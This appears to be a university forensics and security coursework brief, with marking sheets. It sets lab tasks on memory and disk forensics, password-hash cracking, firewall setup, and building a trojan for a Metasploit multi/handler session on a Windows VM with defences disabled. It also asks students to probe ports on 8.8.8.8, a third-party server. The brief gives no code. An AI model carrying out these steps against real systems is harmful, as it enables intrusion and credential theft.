Professional Documents
Culture Documents
Nov2023 Hdin Studentname A201in CW Ms
Nov2023 Hdin Studentname A201in CW Ms
A201IN
Forensics and Security Management
Course Work
INSTRUCTIONS TO CANDIDATE
Page 1 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
Questions.
Task 1
You are given a memory dump file for forensics investigation. The required dump
file was uploaded at https://shorturl.at/msWX1. You may have to use any suitable
tool to analyze the following.
(a) Determine OS and build number of the system or computer from which the
dump was extracted for evidence.
(b) What is the PID of SearchIndexer?
(c) What is the last directory accessed by the user?
(d) There are many suspicious open ports, which are these? (protocol:port)
(e) Identify malicious code on captured evidence and analyse any one process
from a list of processes that Volatility suspects may contain injected code in
VIRUSTOTAL to detect malware and security breaches.
(10 marks)
Task 2
This task shall require a virtual machine installed with Windows Server 2012 OS.
After deploying this VM, modify the group policy of Windows Server in related
with password policy to perform the required tasks -
- Minimum password length – 3 characters
- Password must meet complexity requirements - disabled
(a) Create 3 users with the following password requirement on Windows Server.
- The first user account’s password should have at least 5 characters and not
more than 6 characters, with Numbers, Uppercase and Lowercase letters,
and without using any special characters.
- The second user account’s password should have 5 characters with
Uppercase and Lowercase letters only, and without using any Numbers or
special characters.
- The third user account’s password length and complexity should meet PCI
DSS standards requirement.
Page 2 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
(b) A recent security news described that print spooler service is vulnerable to a
remote attack.
- Find out one CVE for that vulnerability of remote attack to print spooler
service. Investigate which application is representing and running for that
service in Windows Server.
(c) Perform memory dump of Windows Server to a file.
(d) Analyse and discover the hash value of user accounts, and the process list on
memory dump file. Show your workings.
(e) After exporting the hash value of user accounts to a file, crack them with
suitable software to reveal weak passwords of the first and second user account.
(10 marks)
Task 3
This task requires you to work with your Windows system for the following:
(Show your workings with related screenshots and codes.)
(a) Discover a tool in Windows Operating system machine that can show which
application is using how much network bandwidth and going to which
destination.
(b) Find out at least three opening or listening ports on IP address 8.8.8.8
(c) Turn on Windows Firewall Logging for all network profiles. Log size should
be at least 10 MB. Log should be stored under (C:\Firewall-Log\) directory
and enable logging for all packets.
(d) Block the access of all web traffic from your Windows system to the website
of testphp.vulnweb.com by using Windows Firewall rule. Analyze DROP
rules for testphp.vulnweb.com in firewall logging as your organization’s
policy.
Page 3 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
(e) Create a virtual disk with size of 2GB, and mount it with drive letter “V”.
Encrypt this drive partition with BitLocker encryption and print or export the
recovery key file to a different storage location.
(10 marks)
Task 4
A crime had happened in an office, and a related computer was seized and
controlled with the compliance of chain of custody. From that computer, the disk
image of hard disk drive was taken out for further investigation to trace back. This
disk image was upload on the following links –
https://download.vulnhub.com/ha/sherlock.ova
https://drive.google.com/file/d/
1UQMOphUUezNWwwTXGvdcMO1aLboETt6w/view?usp=sharing
(a) You need to download that file from any link and import into VMware
Workstation as a virtual machine in a directory. After that you have to find the
virtual disk file “.vmdk” in that directory of your machine.
(b) Setup and use a disk forensics software to investigate the disk image file for the
following –
i. What kind of operating system is installed in the disk image?
ii. One file of waveform audio file format that may have some message
iii. A folder that contains 15 pictures which may reveal the images of online
victim.
iv. Three email message files received from the criminal and parts of filename
are
1601397957.V801Ie2533M1xxxxxxxxxxx
1601397722.V801Ie252eM8xxxxxxxxxxx
1601397590.M663026xxxxxxxxxxxxxx
v. Two text files (10_Points.txt and 25_Points.txt) that have shown you had
found some hints.
(10 marks)
Page 4 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
Task 5
This task includes penetration testing to a windows system that has Windows
Defender service and Windows Security Disabled. You may have to use “Kali
Linux” and any “Windows” systems.
(a) Assign necessary network settings and firewall rules allowed on “Kali
Linux” and “Windows” system. The two systems should have network
connectivity. (You may have to use Host only in network adapter setting of
VMs.)
(b) Make a folder sharing and remote desktop service setup on Windows
system.
(c) Do port scan to “Windows” system by nmap for tcp 21,25,53,80,389,443,
445,465,1433,3389. Show the result which ports are open.
(d) Create a trojan file in Kali Linux and upload the file to Windows system.
(e) Test exploitation – by multi/handler exploit – open trojan file access. Show
the result. And if the exploit is successful, show the system info and active
user id.
(10 marks)
Page 5 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
Student needs to print this cover sheet and attach on the assignment/project report before
submission to the respective tutor
Date of Name of
Submission: Lecturer:
Justification:
Collusion check
Page 6 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
1st Marker 2nd Marker Final
Learning Outcome / Marking Guide Weightage
( ) ( ) Mark
Page 7 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
(b) Three opening or listening ports 1
(:80)
(c) Enable Firewall Log 2
(d) Block and Check Fire Log 3
(e) BitLocker Drive 3
Task 4- Investigation the disk image file
Name of
Lecturer:
Page 8 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
Module Code & Name: A201IN – Forensics and Security Management
Assessment
Coursework – HDIN A201IN
Title:
Date completed:
Date completed:
Staff Declaration: We agree that work to be marked anonymously will be treated as such until marking
and internal moderation has been completed.
Page 9 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0